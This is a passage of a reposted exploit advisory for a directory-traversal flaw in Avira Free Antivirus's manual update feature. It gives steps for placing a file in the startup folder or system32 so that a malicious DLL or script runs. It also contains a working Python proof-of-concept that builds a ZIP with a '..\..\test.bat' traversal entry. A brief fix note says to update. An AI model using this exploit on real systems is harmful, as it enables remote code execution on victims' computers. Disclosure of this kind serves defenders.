C:\ # 3. You can change the directory go to startup and when the user reboots the script will get executed or you can write a malicious dll to a program directory or # system32 directory which will get loaded and we gain remote command execution. # 4. Open avira free antivirus # 5. Go to update -> Manual Update # 6. Select the malicious file # 7. Directory traversal was sucessfull # Youtube Video: https://www.youtube.com/watch?v=IIEgWiDcw2Q # POC: #!/usr/bin/python -w banner = "" banner += " ___ __ ____ _ _ \n" banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n" banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n" banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n" banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n" print banner import zipfile, sys if(len(sys.argv) != 2): print "[+] Usage : python exploit.py file_to_do_the_traversal [+]" print "[+] Example: python exploit.py test.txt" exit(0) print "[+] Creating Zip File [+]" zf = zipfile.ZipFile("xvdf_fusebundle.zip", "w") zf.write(sys.argv[1], "..\\..\\..\\..\\..\\..\\..\\..\\test.bat") zf.close() print "[+] Created xvdf_fusebundle.zip successfully [+]" # Fix: # Update to the latest version. Sursa: https://www.exploit-db.com/exploits/40741/